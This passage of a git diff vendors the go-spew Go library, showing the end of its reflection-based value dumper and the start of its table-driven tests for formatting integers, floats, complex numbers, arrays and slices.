+	d.w.Write(closeParenBytes)
+
+	// Display pointer information.
+	if !d.cs.DisablePointerAddresses && len(pointerChain) > 0 {
+		d.w.Write(openParenBytes)
+		for i, addr := range pointerChain {
+			if i > 0 {
+				d.w.Write(pointerChainBytes)
+			}
+			printHexPtr(d.w, addr)
+		}
+		d.w.Write(closeParenBytes)
+	}
+
+	// Display dereferenced value.
+	d.w.Write(openParenBytes)
+	switch {
+	case nilFound == true:
+		d.w.Write(nilAngleBytes)
+
+	case cycleFound == true:
+		d.w.Write(circularBytes)
+
+	default:
+		d.ignoreNextType = true
+		d.dump(ve)
+	}
+	d.w.Write(closeParenBytes)
+}
+
+// dumpSlice handles formatting of arrays and slices.  Byte (uint8 under
+// reflection) arrays and slices are dumped in hexdump -C fashion.
+func (d *dumpState) dumpSlice(v reflect.Value) {
+	// Determine whether this type should be hex dumped or not.  Also,
+	// for types which should be hexdumped, try to use the underlying data
+	// first, then fall back to trying to convert them to a uint8 slice.
+	var buf []uint8
+	doConvert := false
+	doHexDump := false
+	numEntries := v.Len()
+	if numEntries > 0 {
+		vt := v.Index(0).Type()
+		vts := vt.String()
+		switch {
+		// C types that need to be converted.
+		case cCharRE.MatchString(vts):
+			fallthrough
+		case cUnsignedCharRE.MatchString(vts):
+			fallthrough
+		case cUint8tCharRE.MatchString(vts):
+			doConvert = true
+
+		// Try to use existing uint8 slices and fall back to converting
+		// and copying if that fails.
+		case vt.Kind() == reflect.Uint8:
+			// We need an addressable interface to convert the type
+			// to a byte slice.  However, the reflect package won't
+			// give us an interface on certain things like
+			// unexported struct fields in order to enforce
+			// visibility rules.  We use unsafe, when available, to
+			// bypass these restrictions since this package does not
+			// mutate the values.
+			vs := v
+			if !vs.CanInterface() || !vs.CanAddr() {
+				vs = unsafeReflectValue(vs)
+			}
+			if !UnsafeDisabled {
+				vs = vs.Slice(0, numEntries)
+
+				// Use the existing uint8 slice if it can be
+				// type asserted.
+				iface := vs.Interface()
+				if slice, ok := iface.([]uint8); ok {
+					buf = slice
+					doHexDump = true
+					break
+				}
+			}
+
+			// The underlying data needs to be converted if it can't
+			// be type asserted to a uint8 slice.
+			doConvert = true
+		}
+
+		// Copy and convert the underlying type if needed.
+		if doConvert && vt.ConvertibleTo(uint8Type) {
+			// Convert and copy each element into a uint8 byte
+			// slice.
+			buf = make([]uint8, numEntries)
+			for i := 0; i < numEntries; i++ {
+				vv := v.Index(i)
+				buf[i] = uint8(vv.Convert(uint8Type).Uint())
+			}
+			doHexDump = true
+		}
+	}
+
+	// Hexdump the entire slice as needed.
+	if doHexDump {
+		indent := strings.Repeat(d.cs.Indent, d.depth)
+		str := indent + hex.Dump(buf)
+		str = strings.Replace(str, "\n", "\n"+indent, -1)
+		str = strings.TrimRight(str, d.cs.Indent)
+		d.w.Write([]byte(str))
+		return
+	}
+
+	// Recursively call dump for each item.
+	for i := 0; i < numEntries; i++ {
+		d.dump(d.unpackValue(v.Index(i)))
+		if i < (numEntries - 1) {
+			d.w.Write(commaNewlineBytes)
+		} else {
+			d.w.Write(newlineBytes)
+		}
+	}
+}
+
+// dump is the main workhorse for dumping a value.  It uses the passed reflect
+// value to figure out what kind of object we are dealing with and formats it
+// appropriately.  It is a recursive function, however circular data structures
+// are detected and handled properly.
+func (d *dumpState) dump(v reflect.Value) {
+	// Handle invalid reflect values immediately.
+	kind := v.Kind()
+	if kind == reflect.Invalid {
+		d.w.Write(invalidAngleBytes)
+		return
+	}
+
+	// Handle pointers specially.
+	if kind == reflect.Ptr {
+		d.indent()
+		d.dumpPtr(v)
+		return
+	}
+
+	// Print type information unless already handled elsewhere.
+	if !d.ignoreNextType {
+		d.indent()
+		d.w.Write(openParenBytes)
+		d.w.Write([]byte(v.Type().String()))
+		d.w.Write(closeParenBytes)
+		d.w.Write(spaceBytes)
+	}
+	d.ignoreNextType = false
+
+	// Display length and capacity if the built-in len and cap functions
+	// work with the value's kind and the len/cap itself is non-zero.
+	valueLen, valueCap := 0, 0
+	switch v.Kind() {
+	case reflect.Array, reflect.Slice, reflect.Chan:
+		valueLen, valueCap = v.Len(), v.Cap()
+	case reflect.Map, reflect.String:
+		valueLen = v.Len()
+	}
+	if valueLen != 0 || !d.cs.DisableCapacities && valueCap != 0 {
+		d.w.Write(openParenBytes)
+		if valueLen != 0 {
+			d.w.Write(lenEqualsBytes)
+			printInt(d.w, int64(valueLen), 10)
+		}
+		if !d.cs.DisableCapacities && valueCap != 0 {
+			if valueLen != 0 {
+				d.w.Write(spaceBytes)
+			}
+			d.w.Write(capEqualsBytes)
+			printInt(d.w, int64(valueCap), 10)
+		}
+		d.w.Write(closeParenBytes)
+		d.w.Write(spaceBytes)
+	}
+
+	// Call Stringer/error interfaces if they exist and the handle methods flag
+	// is enabled
+	if !d.cs.DisableMethods {
+		if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+			if handled := handleMethods(d.cs, d.w, v); handled {
+				return
+			}
+		}
+	}
+
+	switch kind {
+	case reflect.Invalid:
+		// Do nothing.  We should never get here since invalid has already
+		// been handled above.
+
+	case reflect.Bool:
+		printBool(d.w, v.Bool())
+
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		printInt(d.w, v.Int(), 10)
+
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+		printUint(d.w, v.Uint(), 10)
+
+	case reflect.Float32:
+		printFloat(d.w, v.Float(), 32)
+
+	case reflect.Float64:
+		printFloat(d.w, v.Float(), 64)
+
+	case reflect.Complex64:
+		printComplex(d.w, v.Complex(), 32)
+
+	case reflect.Complex128:
+		printComplex(d.w, v.Complex(), 64)
+
+	case reflect.Slice:
+		if v.IsNil() {
+			d.w.Write(nilAngleBytes)
+			break
+		}
+		fallthrough
+
+	case reflect.Array:
+		d.w.Write(openBraceNewlineBytes)
+		d.depth++
+		if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+			d.indent()
+			d.w.Write(maxNewlineBytes)
+		} else {
+			d.dumpSlice(v)
+		}
+		d.depth--
+		d.indent()
+		d.w.Write(closeBraceBytes)
+
+	case reflect.String:
+		d.w.Write([]byte(strconv.Quote(v.String())))
+
+	case reflect.Interface:
+		// The only time we should get here is for nil interfaces due to
+		// unpackValue calls.
+		if v.IsNil() {
+			d.w.Write(nilAngleBytes)
+		}
+
+	case reflect.Ptr:
+		// Do nothing.  We should never get here since pointers have already
+		// been handled above.
+
+	case reflect.Map:
+		// nil maps should be indicated as different than empty maps
+		if v.IsNil() {
+			d.w.Write(nilAngleBytes)
+			break
+		}
+
+		d.w.Write(openBraceNewlineBytes)
+		d.depth++
+		if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+			d.indent()
+			d.w.Write(maxNewlineBytes)
+		} else {
+			numEntries := v.Len()
+			keys := v.MapKeys()
+			if d.cs.SortKeys {
+				sortValues(keys, d.cs)
+			}
+			for i, key := range keys {
+				d.dump(d.unpackValue(key))
+				d.w.Write(colonSpaceBytes)
+				d.ignoreNextIndent = true
+				d.dump(d.unpackValue(v.MapIndex(key)))
+				if i < (numEntries - 1) {
+					d.w.Write(commaNewlineBytes)
+				} else {
+					d.w.Write(newlineBytes)
+				}
+			}
+		}
+		d.depth--
+		d.indent()
+		d.w.Write(closeBraceBytes)
+
+	case reflect.Struct:
+		d.w.Write(openBraceNewlineBytes)
+		d.depth++
+		if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+			d.indent()
+			d.w.Write(maxNewlineBytes)
+		} else {
+			vt := v.Type()
+			numFields := v.NumField()
+			for i := 0; i < numFields; i++ {
+				d.indent()
+				vtf := vt.Field(i)
+				d.w.Write([]byte(vtf.Name))
+				d.w.Write(colonSpaceBytes)
+				d.ignoreNextIndent = true
+				d.dump(d.unpackValue(v.Field(i)))
+				if i < (numFields - 1) {
+					d.w.Write(commaNewlineBytes)
+				} else {
+					d.w.Write(newlineBytes)
+				}
+			}
+		}
+		d.depth--
+		d.indent()
+		d.w.Write(closeBraceBytes)
+
+	case reflect.Uintptr:
+		printHexPtr(d.w, uintptr(v.Uint()))
+
+	case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+		printHexPtr(d.w, v.Pointer())
+
+	// There were not any other types at the time this code was written, but
+	// fall back to letting the default fmt package handle it in case any new
+	// types are added.
+	default:
+		if v.CanInterface() {
+			fmt.Fprintf(d.w, "%v", v.Interface())
+		} else {
+			fmt.Fprintf(d.w, "%v", v.String())
+		}
+	}
+}
+
+// fdump is a helper function to consolidate the logic from the various public
+// methods which take varying writers and config states.
+func fdump(cs *ConfigState, w io.Writer, a ...interface{}) {
+	for _, arg := range a {
+		if arg == nil {
+			w.Write(interfaceBytes)
+			w.Write(spaceBytes)
+			w.Write(nilAngleBytes)
+			w.Write(newlineBytes)
+			continue
+		}
+
+		d := dumpState{w: w, cs: cs}
+		d.pointers = make(map[uintptr]int)
+		d.dump(reflect.ValueOf(arg))
+		d.w.Write(newlineBytes)
+	}
+}
+
+// Fdump formats and displays the passed arguments to io.Writer w.  It formats
+// exactly the same as Dump.
+func Fdump(w io.Writer, a ...interface{}) {
+	fdump(&Config, w, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func Sdump(a ...interface{}) string {
+	var buf bytes.Buffer
+	fdump(&Config, &buf, a...)
+	return buf.String()
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value.  It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+	* Pointers are dereferenced and followed
+	* Circular data structures are detected and handled properly
+	* Custom Stringer/error interfaces are optionally invoked, including
+	  on unexported types
+	* Custom types which only implement the Stringer/error interfaces via
+	  a pointer receiver are optionally invoked when passing non-pointer
+	  variables
+	* Byte arrays and slices are dumped like the hexdump -C command which
+	  includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by an exported package global,
+spew.Config.  See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func Dump(a ...interface{}) {
+	fdump(&Config, os.Stdout, a...)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump_test.go b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
new file mode 100644
index 0000000000..5aad9c7af0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
@@ -0,0 +1,1042 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer and double pointer to the
+base test element are also tested to ensure proper indirection across all types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Array containing bytes
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Slice containing bytes
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+  exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+*/
+
+package spew_test
+
+import (
+	"bytes"
+	"fmt"
+	"testing"
+	"unsafe"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+// dumpTest is used to describe a test to be performed against the Dump method.
+type dumpTest struct {
+	in    interface{}
+	wants []string
+}
+
+// dumpTests houses all of the tests to be performed against the Dump method.
+var dumpTests = make([]dumpTest, 0)
+
+// addDumpTest is a helper method to append the passed input and desired result
+// to dumpTests
+func addDumpTest(in interface{}, wants ...string) {
+	test := dumpTest{in, wants}
+	dumpTests = append(dumpTests, test)
+}
+
+func addIntDumpTests() {
+	// Max int8.
+	v := int8(127)
+	nv := (*int8)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "int8"
+	vs := "127"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Max int16.
+	v2 := int16(32767)
+	nv2 := (*int16)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "int16"
+	v2s := "32767"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+
+	// Max int32.
+	v3 := int32(2147483647)
+	nv3 := (*int32)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "int32"
+	v3s := "2147483647"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+
+	// Max int64.
+	v4 := int64(9223372036854775807)
+	nv4 := (*int64)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "int64"
+	v4s := "9223372036854775807"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+	addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+	addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+	addDumpTest(nv4, "(*"+v4t+")(<nil>)\n")
+
+	// Max int.
+	v5 := int(2147483647)
+	nv5 := (*int)(nil)
+	pv5 := &v5
+	v5Addr := fmt.Sprintf("%p", pv5)
+	pv5Addr := fmt.Sprintf("%p", &pv5)
+	v5t := "int"
+	v5s := "2147483647"
+	addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+	addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+	addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+	addDumpTest(nv5, "(*"+v5t+")(<nil>)\n")
+}
+
+func addUintDumpTests() {
+	// Max uint8.
+	v := uint8(255)
+	nv := (*uint8)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "uint8"
+	vs := "255"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Max uint16.
+	v2 := uint16(65535)
+	nv2 := (*uint16)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uint16"
+	v2s := "65535"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+
+	// Max uint32.
+	v3 := uint32(4294967295)
+	nv3 := (*uint32)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "uint32"
+	v3s := "4294967295"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+
+	// Max uint64.
+	v4 := uint64(18446744073709551615)
+	nv4 := (*uint64)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "uint64"
+	v4s := "18446744073709551615"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+	addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+	addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+	addDumpTest(nv4, "(*"+v4t+")(<nil>)\n")
+
+	// Max uint.
+	v5 := uint(4294967295)
+	nv5 := (*uint)(nil)
+	pv5 := &v5
+	v5Addr := fmt.Sprintf("%p", pv5)
+	pv5Addr := fmt.Sprintf("%p", &pv5)
+	v5t := "uint"
+	v5s := "4294967295"
+	addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+	addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+	addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+	addDumpTest(nv5, "(*"+v5t+")(<nil>)\n")
+}
+
+func addBoolDumpTests() {
+	// Boolean true.
+	v := bool(true)
+	nv := (*bool)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "bool"
+	vs := "true"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Boolean false.
+	v2 := bool(false)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "bool"
+	v2s := "false"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFloatDumpTests() {
+	// Standard float32.
+	v := float32(3.1415)
+	nv := (*float32)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "float32"
+	vs := "3.1415"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Standard float64.
+	v2 := float64(3.1415926)
+	nv2 := (*float64)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "float64"
+	v2s := "3.1415926"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+}
+
+func addComplexDumpTests() {
+	// Standard complex64.
+	v := complex(float32(6), -2)
+	nv := (*complex64)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "complex64"
+	vs := "(6-2i)"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Standard complex128.
+	v2 := complex(float64(-6), 2)
+	nv2 := (*complex128)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "complex128"
+	v2s := "(-6+2i)"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+}
+
+func addArrayDumpTests() {
+	// Array containing standard ints.
+	v := [3]int{1, 2, 3}
+	vLen := fmt.Sprintf("%d", len(v))
+	vCap := fmt.Sprintf("%d", cap(v))
+	nv := (*[3]int)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "int"
+	vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 1,\n (" +
+		vt + ") 2,\n (" + vt + ") 3\n}"
+	addDumpTest(v, "([3]"+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*[3]"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**[3]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*[3]"+vt+")(<nil>)\n")
+
+	// Array containing type with custom formatter on pointer receiver only.
+	v2i0 := pstringer("1")
+	v2i1 := pstringer("2")
+	v2i2 := pstringer("3")
+	v2 := [3]pstringer{v2i0, v2i1, v2i2}
+	v2i0Len := fmt.Sprintf("%d", len(v2i0))
+	v2i1Len := fmt.Sprintf("%d", len(v2i1))
+	v2i2Len := fmt.Sprintf("%d", len(v2i2))
+	v2Len := fmt.Sprintf("%d", len(v2))
+	v2Cap := fmt.Sprintf("%d", cap(v2))
+	nv2 := (*[3]pstringer)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.pstringer"
+	v2sp := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+		") (len=" + v2i0Len + ") stringer 1,\n (" + v2t +
+		") (len=" + v2i1Len + ") stringer 2,\n (" + v2t +
+		") (len=" + v2i2Len + ") " + "stringer 3\n}"
+	v2s := v2sp
+	if spew.UnsafeDisabled {
+		v2s = "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+			") (len=" + v2i0Len + ") \"1\",\n (" + v2t + ") (len=" +
+			v2i1Len + ") \"2\",\n (" + v2t + ") (len=" + v2i2Len +
+			") " + "\"3\"\n}"
+	}
+	addDumpTest(v2, "([3]"+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*[3]"+v2t+")("+v2Addr+")("+v2sp+")\n")
+	addDumpTest(&pv2, "(**[3]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2sp+")\n")
+	addDumpTest(nv2, "(*[3]"+v2t+")(<nil>)\n")
+
+	// Array containing interfaces.
+	v3i0 := "one"
+	v3 := [3]interface{}{v3i0, int(2), uint(3)}
+	v3i0Len := fmt.Sprintf("%d", len(v3i0))
+	v3Len := fmt.Sprintf("%d", len(v3))
+	v3Cap := fmt.Sprintf("%d", cap(v3))
+	nv3 := (*[3]interface{})(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "[3]interface {}"
+	v3t2 := "string"
+	v3t3 := "int"
+	v3t4 := "uint"
+	v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+		"(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+		v3t4 + ") 3\n}"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+
+	// Array containing bytes.
+	v4 := [34]byte{
+		0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+		0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+		0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+		0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+		0x31, 0x32,
+	}
+	v4Len := fmt.Sprintf("%d", len(v4))
+	v4Cap := fmt.Sprintf("%d", cap(v4))
+	nv4 := (*[34]byte)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "[34]uint8"
+	v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+		"{\n 00000000  11 12 13 14 15 16 17 18  19 1a 1b 1c 1d 1e 1f 20" +
+		"  |............... |\n" +
+		" 00000010  21 22 23 24 25 26 27 28  29 2a 2b 2c 2d 2e 2f 30" +
+		"  |!\"#$%&'()*+,-./0|\n" +
+		" 00000020  31 32                                           " +
+		"  |12|\n}"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+	addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+	addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+	addDumpTest(nv4, "(*"+v4t+")(<nil>)\n")
+}
+
+func addSliceDumpTests() {
+	// Slice containing standard float32 values.
+	v := []float32{3.14, 6.28, 12.56}
+	vLen := fmt.Sprintf("%d", len(v))
+	vCap := fmt.Sprintf("%d", cap(v))
+	nv := (*[]float32)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "float32"
+	vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 3.14,\n (" +
+		vt + ") 6.28,\n (" + vt + ") 12.56\n}"
+	addDumpTest(v, "([]"+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*[]"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**[]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*[]"+vt+")(<nil>)\n")
+
+	// Slice containing type with custom formatter on pointer receiver only.
+	v2i0 := pstringer("1")
+	v2i1 := pstringer("2")
+	v2i2 := pstringer("3")
+	v2 := []pstringer{v2i0, v2i1, v2i2}
+	v2i0Len := fmt.Sprintf("%d", len(v2i0))
+	v2i1Len := fmt.Sprintf("%d", len(v2i1))
+	v2i2Len := fmt.Sprintf("%d", len(v2i2))
+	v2Len := fmt.Sprintf("%d", len(v2))
+	v2Cap := fmt.Sprintf("%d", cap(v2))
+	nv2 := (*[]pstringer)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.pstringer"
+	v2s := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + ") (len=" +
+		v2i0Len + ") stringer 1,\n (" + v2t + ") (len=" + v2i1Len +
+		") stringer 2,\n (" + v2t + ") (len=" + v2i2Len + ") " +
+		"stringer 3\n}"
+	addDumpTest(v2, "([]"+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*[]"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**[]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*[]"+v2t+")(<nil>)\n")
+
+	// Slice containing interfaces.
+	v3i0 := "one"
+	v3 := []interface{}{v3i0, int(2), uint(3), nil}
+	v3i0Len := fmt.Sprintf("%d", len(v3i0))
